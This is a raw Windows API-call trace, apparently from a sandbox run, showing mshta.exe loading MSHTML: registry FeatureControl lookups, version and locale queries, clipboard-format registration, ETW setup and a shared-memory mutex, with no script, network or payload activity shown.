0x74166ad0 [0221.290] __dllonexit () returned 0x74166adf [0221.291] __dllonexit () returned 0x74166aee [0221.291] __dllonexit () returned 0x74166afd [0221.291] __dllonexit () returned 0x74166b0d [0221.291] __dllonexit () returned 0x7416720c [0221.291] __dllonexit () returned 0x74166b1c [0221.291] __dllonexit () returned 0x74166b2f [0221.291] __dllonexit () returned 0x74166b49 [0221.291] __dllonexit () returned 0x74166b58 [0221.291] __dllonexit () returned 0x74166b67 [0221.291] __dllonexit () returned 0x74166b76 [0221.291] __dllonexit () returned 0x74166b85 [0221.291] __dllonexit () returned 0x74166b94 [0221.291] __dllonexit () returned 0x74166ba3 [0221.291] __dllonexit () returned 0x74166bb2 [0221.291] __dllonexit () returned 0x74166bc1 [0221.291] __dllonexit () returned 0x74166bd0 [0221.292] __dllonexit () returned 0x74166bdf [0221.292] __dllonexit () returned 0x74166bee [0221.292] __dllonexit () returned 0x74166bfd [0221.292] __dllonexit () returned 0x74166c0c [0221.292] __dllonexit () returned 0x74166c1b [0221.292] __dllonexit () returned 0x74166c2a [0221.292] __dllonexit () returned 0x74166c3d [0221.292] __dllonexit () returned 0x74166c4c [0221.292] __dllonexit () returned 0x74166c5b [0221.292] __dllonexit () returned 0x74166c75 [0221.292] __dllonexit () returned 0x74166c8f [0221.292] __dllonexit () returned 0x74166ca9 [0221.292] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 286331153 [0221.292] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 286331153 [0221.292] __dllonexit () returned 0x74166cb1 [0221.293] __dllonexit () returned 0x74167294 [0221.293] __dllonexit () returned 0x74166ccb [0221.293] __dllonexit () returned 0x74166cd3 [0221.293] __dllonexit () returned 0x74166ce2 [0221.293] __dllonexit () returned 0x74166cf1 [0221.293] __dllonexit () returned 0x74166d00 [0221.293] __dllonexit () returned 0x7415f72d [0221.293] __dllonexit () returned 0x74166d43 [0221.293] __dllonexit () returned 0x74166d56 [0221.293] __dllonexit () returned 0x7415f095 [0221.293] __dllonexit () returned 0x74166d65 [0221.293] __dllonexit () returned 0x74166d78 [0221.293] __dllonexit () returned 0x74166d87 [0221.293] __dllonexit () returned 0x74166d9a [0221.294] __dllonexit () returned 0x74162256 [0221.294] __dllonexit () returned 0x7416679d [0221.294] __dllonexit () returned 0x74166dd5 [0221.294] __dllonexit () returned 0x74166df8 [0221.294] __dllonexit () returned 0x74166e07 [0221.294] __dllonexit () returned 0x741676cb [0221.294] __dllonexit () returned 0x74166e1a [0221.294] __dllonexit () returned 0x741672aa [0221.294] __dllonexit () returned 0x741672cb [0221.294] __dllonexit () returned 0x74166e3a [0221.294] GetCurrentThreadId () returned 0xc4 [0221.295] CoCreateGuid (in: pguid=0x7447ad20 | out: pguid=0x7447ad20*(Data1=0x49b7c686, Data2=0x9fdc, Data3=0x45a5, Data4=([0]=0xa4, [1]=0x47, [2]=0xb6, [3]=0x36, [4]=0x9f, [5]=0xec, [6]=0xe5, [7]=0x4d))) returned 0x0 [0221.296] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x200) returned 0x52e6f0 [0221.296] __dllonexit () returned 0x7416733d [0221.296] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14ed00, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0221.296] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe" [0221.296] StrCmpICW (pszStr1="mshta.exe", pszStr2="iexplore.exe") returned 4 [0221.296] StrCmpICW (pszStr1="mshta.exe", pszStr2="explorer.exe") returned 8 [0221.296] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x52e8f8 [0221.296] SHRegGetValueW () returned 0x2 [0221.296] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef4c | out: phkResult=0x14ef4c*=0x0) returned 0x2 [0221.296] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef48 | out: phkResult=0x14ef48*=0x0) returned 0x2 [0221.297] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef40 | out: phkResult=0x14ef40*=0x94) returned 0x0 [0221.297] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef44 | out: phkResult=0x14ef44*=0x98) returned 0x0 [0221.457] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef00 | out: phkResult=0x14ef00*=0x0) returned 0x2 [0221.469] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef00 | out: phkResult=0x14ef00*=0x0) returned 0x2 [0221.469] RegCloseKey (hKey=0x0) returned 0x6 [0221.470] RegCloseKey (hKey=0x0) returned 0x6 [0221.470] RegCloseKey (hKey=0x94) returned 0x0 [0221.470] RegCloseKey (hKey=0x98) returned 0x0 [0221.470] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef40 | out: phkResult=0x14ef40*=0x98) returned 0x0 [0221.470] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef44 | out: phkResult=0x14ef44*=0x94) returned 0x0 [0221.470] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef00 | out: phkResult=0x14ef00*=0x0) returned 0x2 [0221.470] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef00 | out: phkResult=0x14ef00*=0x0) returned 0x2 [0221.470] RegCloseKey (hKey=0x0) returned 0x6 [0221.470] RegCloseKey (hKey=0x0) returned 0x6 [0221.470] RegCloseKey (hKey=0x98) returned 0x0 [0221.470] RegCloseKey (hKey=0x94) returned 0x0 [0221.470] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef40 | out: phkResult=0x14ef40*=0x94) returned 0x0 [0221.470] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef44 | out: phkResult=0x14ef44*=0x98) returned 0x0 [0221.471] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef00 | out: phkResult=0x14ef00*=0x0) returned 0x2 [0221.471] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef00 | out: phkResult=0x14ef00*=0x0) returned 0x2 [0221.471] RegCloseKey (hKey=0x0) returned 0x6 [0221.471] RegCloseKey (hKey=0x0) returned 0x6 [0221.471] RegCloseKey (hKey=0x94) returned 0x0 [0221.471] RegCloseKey (hKey=0x98) returned 0x0 [0221.471] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef40 | out: phkResult=0x14ef40*=0x98) returned 0x0 [0221.471] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef44 | out: phkResult=0x14ef44*=0x94) returned 0x0 [0221.471] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef00 | out: phkResult=0x14ef00*=0x0) returned 0x2 [0221.471] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef00 | out: phkResult=0x14ef00*=0x9c) returned 0x0 [0221.471] SHRegGetValueW () returned 0x2 [0221.471] SHRegGetValueW () returned 0x2 [0221.471] RegCloseKey (hKey=0x9c) returned 0x0 [0221.471] RegCloseKey (hKey=0x0) returned 0x6 [0221.471] RegCloseKey (hKey=0x0) returned 0x6 [0221.471] RegCloseKey (hKey=0x98) returned 0x0 [0221.471] RegCloseKey (hKey=0x94) returned 0x0 [0221.472] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef40 | out: phkResult=0x14ef40*=0x94) returned 0x0 [0221.472] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef44 | out: phkResult=0x14ef44*=0x98) returned 0x0 [0221.472] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef00 | out: phkResult=0x14ef00*=0x0) returned 0x2 [0221.472] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef00 | out: phkResult=0x14ef00*=0x0) returned 0x2 [0221.472] RegCloseKey (hKey=0x0) returned 0x6 [0221.472] RegCloseKey (hKey=0x0) returned 0x6 [0221.472] RegCloseKey (hKey=0x94) returned 0x0 [0221.472] RegCloseKey (hKey=0x98) returned 0x0 [0221.472] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef40 | out: phkResult=0x14ef40*=0x98) returned 0x0 [0221.472] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef44 | out: phkResult=0x14ef44*=0x94) returned 0x0 [0221.472] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef00 | out: phkResult=0x14ef00*=0x0) returned 0x2 [0221.473] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef00 | out: phkResult=0x14ef00*=0x0) returned 0x2 [0221.473] RegCloseKey (hKey=0x0) returned 0x6 [0221.473] RegCloseKey (hKey=0x0) returned 0x6 [0221.473] RegCloseKey (hKey=0x98) returned 0x0 [0221.473] RegCloseKey (hKey=0x94) returned 0x0 [0221.474] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef40 | out: phkResult=0x14ef40*=0x94) returned 0x0 [0221.474] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef44 | out: phkResult=0x14ef44*=0x98) returned 0x0 [0221.474] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef00 | out: phkResult=0x14ef00*=0x0) returned 0x2 [0221.474] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef00 | out: phkResult=0x14ef00*=0x0) returned 0x2 [0221.474] RegCloseKey (hKey=0x0) returned 0x6 [0221.474] RegCloseKey (hKey=0x0) returned 0x6 [0221.474] RegCloseKey (hKey=0x94) returned 0x0 [0221.475] RegCloseKey (hKey=0x98) returned 0x0 [0221.475] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef40 | out: phkResult=0x14ef40*=0x98) returned 0x0 [0221.475] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef44 | out: phkResult=0x14ef44*=0x94) returned 0x0 [0221.475] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef00 | out: phkResult=0x14ef00*=0x0) returned 0x2 [0221.475] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef00 | out: phkResult=0x14ef00*=0x0) returned 0x2 [0221.475] RegCloseKey (hKey=0x0) returned 0x6 [0221.475] RegCloseKey (hKey=0x0) returned 0x6 [0221.475] RegCloseKey (hKey=0x98) returned 0x0 [0221.475] RegCloseKey (hKey=0x94) returned 0x0 [0221.475] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef40 | out: phkResult=0x14ef40*=0x94) returned 0x0 [0221.475] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef44 | out: phkResult=0x14ef44*=0x98) returned 0x0 [0221.476] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef00 | out: phkResult=0x14ef00*=0x0) returned 0x2 [0221.476] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef00 | out: phkResult=0x14ef00*=0x0) returned 0x2 [0221.476] RegCloseKey (hKey=0x0) returned 0x6 [0221.476] RegCloseKey (hKey=0x0) returned 0x6 [0221.476] RegCloseKey (hKey=0x94) returned 0x0 [0221.476] RegCloseKey (hKey=0x98) returned 0x0 [0221.476] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef40 | out: phkResult=0x14ef40*=0x98) returned 0x0 [0221.476] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef44 | out: phkResult=0x14ef44*=0x94) returned 0x0 [0221.476] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef00 | out: phkResult=0x14ef00*=0x0) returned 0x2 [0221.477] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef00 | out: phkResult=0x14ef00*=0x0) returned 0x2 [0221.477] RegCloseKey (hKey=0x0) returned 0x6 [0221.477] RegCloseKey (hKey=0x0) returned 0x6 [0221.477] RegCloseKey (hKey=0x98) returned 0x0 [0221.477] RegCloseKey (hKey=0x94) returned 0x0 [0221.477] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef40 | out: phkResult=0x14ef40*=0x94) returned 0x0 [0221.477] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef44 | out: phkResult=0x14ef44*=0x98) returned 0x0 [0221.477] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef00 | out: phkResult=0x14ef00*=0x0) returned 0x2 [0221.477] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef00 | out: phkResult=0x14ef00*=0x0) returned 0x2 [0221.477] RegCloseKey (hKey=0x0) returned 0x6 [0221.477] RegCloseKey (hKey=0x0) returned 0x6 [0221.477] RegCloseKey (hKey=0x94) returned 0x0 [0221.477] RegCloseKey (hKey=0x98) returned 0x0 [0221.477] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef40 | out: phkResult=0x14ef40*=0x98) returned 0x0 [0221.478] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef44 | out: phkResult=0x14ef44*=0x94) returned 0x0 [0221.478] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef00 | out: phkResult=0x14ef00*=0x0) returned 0x2 [0221.478] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef00 | out: phkResult=0x14ef00*=0x0) returned 0x2 [0221.478] RegCloseKey (hKey=0x0) returned 0x6 [0221.478] RegCloseKey (hKey=0x0) returned 0x6 [0221.478] RegCloseKey (hKey=0x98) returned 0x0 [0221.478] RegCloseKey (hKey=0x94) returned 0x0 [0221.478] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0221.479] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef40 | out: phkResult=0x14ef40*=0x98) returned 0x0 [0221.479] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef44 | out: phkResult=0x14ef44*=0x9c) returned 0x0 [0221.479] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef00 | out: phkResult=0x14ef00*=0x0) returned 0x2 [0221.479] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef00 | out: phkResult=0x14ef00*=0x0) returned 0x2 [0221.479] RegCloseKey (hKey=0x0) returned 0x6 [0221.479] RegCloseKey (hKey=0x0) returned 0x6 [0221.480] RegCloseKey (hKey=0x98) returned 0x0 [0221.480] RegCloseKey (hKey=0x9c) returned 0x0 [0221.480] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef40 | out: phkResult=0x14ef40*=0x9c) returned 0x0 [0221.480] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef44 | out: phkResult=0x14ef44*=0x98) returned 0x0 [0221.480] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef00 | out: phkResult=0x14ef00*=0x0) returned 0x2 [0221.480] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef00 | out: phkResult=0x14ef00*=0x0) returned 0x2 [0221.480] RegCloseKey (hKey=0x0) returned 0x6 [0221.480] RegCloseKey (hKey=0x0) returned 0x6 [0221.480] RegCloseKey (hKey=0x9c) returned 0x0 [0221.480] RegCloseKey (hKey=0x98) returned 0x0 [0221.480] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef40 | out: phkResult=0x14ef40*=0x98) returned 0x0 [0221.480] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef44 | out: phkResult=0x14ef44*=0x9c) returned 0x0 [0221.481] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef00 | out: phkResult=0x14ef00*=0x0) returned 0x2 [0221.481] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef00 | out: phkResult=0x14ef00*=0x0) returned 0x2 [0221.481] RegCloseKey (hKey=0x0) returned 0x6 [0221.481] RegCloseKey (hKey=0x0) returned 0x6 [0221.481] RegCloseKey (hKey=0x98) returned 0x0 [0221.481] RegCloseKey (hKey=0x9c) returned 0x0 [0221.481] GetSystemMetrics (nIndex=68) returned 4 [0221.481] GetSystemMetrics (nIndex=69) returned 4 [0221.481] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=20) returned 0x14 [0221.492] GetSystemDefaultLCID () returned 0x409 [0221.492] GetVersionExW (in: lpVersionInformation=0x14eea4*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x76f3e36c, dwMinorVersion=0x76f3e0d2, dwBuildNumber=0x7447afd8, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14eea4*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0221.492] GetUserDefaultUILanguage () returned 0x409 [0221.492] GetLocaleInfoW (in: Locale=0x409, LCType=0x58, lpLCData=0x14edf4, cchData=16 | out: lpLCData="\x03") returned 16 [0221.493] GetKeyboardLayoutList (in: nBuff=32, lpList=0x14ee24 | out: lpList=0x14ee24) returned 1 [0221.494] GetSystemMetrics (nIndex=4096) returned 0 [0221.494] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef48 | out: phkResult=0x14ef48*=0x9c) returned 0x0 [0221.494] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef4c | out: phkResult=0x14ef4c*=0x98) returned 0x0 [0221.494] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef08 | out: phkResult=0x14ef08*=0x0) returned 0x2 [0221.494] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x14ef08 | out: phkResult=0x14ef08*=0x0) returned 0x2 [0221.494] RegCloseKey (hKey=0x0) returned 0x6 [0221.494] RegCloseKey (hKey=0x0) returned 0x6 [0221.494] RegCloseKey (hKey=0x9c) returned 0x0 [0221.494] RegCloseKey (hKey=0x98) returned 0x0 [0221.494] GetModuleFileNameW (in: hModule=0x73f40000, lpFilename=0x14edb0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshtml.dll" (normalized: "c:\\windows\\syswow64\\mshtml.dll")) returned 0x1e [0221.494] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x3e) returned 0x523ce8 [0221.494] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a [0221.494] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b [0221.494] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d [0221.494] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f [0221.494] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e [0221.494] RegisterClipboardFormatA (lpszFormat="MS Forms CLSID") returned 0xc14b [0221.495] RegisterClipboardFormatA (lpszFormat="MS Forms Text") returned 0xc14c [0221.499] GetDC (hWnd=0x0) returned 0x100101fa [0221.499] SHCreateShellPalette (hdc=0x0) returned 0x4308007f [0221.501] GetPaletteEntries (in: hpal=0x4308007f, iStart=0x0, cEntries=0x100, pPalEntries=0x7447a494 | out: pPalEntries=0x7447a494) returned 0x100 [0221.501] SHGetInverseCMAP (in: pbMap=0x74478a7c, cbMap=0x4 | out: pbMap=0x74478a7c) returned 0x0 [0221.501] GetDeviceCaps (hdc=0x100101fa, index=38) returned 32409 [0221.501] ReleaseDC (hWnd=0x0, hDC=0x100101fa) returned 1 [0221.501] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x20a) returned 0x52e938 [0221.502] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x2000) returned 0x52f350 [0221.502] GetCurrentProcessId () returned 0x774 [0221.502] _vsnprintf (in: _DstBuf=0x14f2f4, _MaxCount=0x16, _Format="%s%08lX", _ArgList=0x14efbc | out: _DstBuf="#MSHTML#PERF#00000774") returned 21 [0221.502] OpenFileMappingA (dwDesiredAccess=0x2, bInheritHandle=0, lpName="#MSHTML#PERF#00000774") returned 0x0 [0221.502] GetVersionExW (in: lpVersionInformation=0x14efd8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x5135d8, dwMinorVersion=0x100, dwBuildNumber=0x52db38, dwPlatformId=0x510000, szCSDVersion="A") | out: lpVersionInformation=0x14efd8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0221.503] GetModuleHandleW (lpModuleName="advapi32") returned 0x763d0000 [0221.503] GetProcAddress (hModule=0x763d0000, lpProcName="EventWrite") returned 0x76f70c59 [0221.503] GetProcAddress (hModule=0x763d0000, lpProcName="EventRegister") returned 0x76f4f6ba [0221.503] GetProcAddress (hModule=0x763d0000, lpProcName="EventUnregister") returned 0x76f69241 [0221.503] EtwEventRegister () returned 0x0 [0221.503] EtwRegisterTraceGuidsW () returned 0x0 [0221.503] EtwRegisterTraceGuidsW () returned 0x0 [0221.503] EtwEventRegister () returned 0x0 [0221.505] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Program Files\\Microsoft Office\\Office14\\outllib.dll", lpdwHandle=0x14eda4 | out: lpdwHandle=0x14eda4) returned 0x0 [0221.505] GetModuleHandleW (lpModuleName=0x0) returned 0xb40000 [0221.505] GetModuleFileNameW (in: hModule=0xb40000, lpFilename=0x14edb0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0221.505] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe" [0221.512] GetCurrentProcessId () returned 0x774 [0221.512] GetCurrentProcessId () returned 0x774 [0221.514] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Local\\!PrivacIE!SharedMemory!Mutex") returned 0xbc [0221.514] GetLastError () returned 0x0 [0221.570] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10, lpName="Local\\!PrivacIE!SharedMem!Counter") returned 0x100 [0221.570] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x250000 [0221.572] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x331d28 | out: hHeap=0x330000) returned 1 [0221.572] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x331e38 | out: hHeap=0x330000) returned 1 [0221.572] RegCloseKey (hKey=0x42) returned 0x0 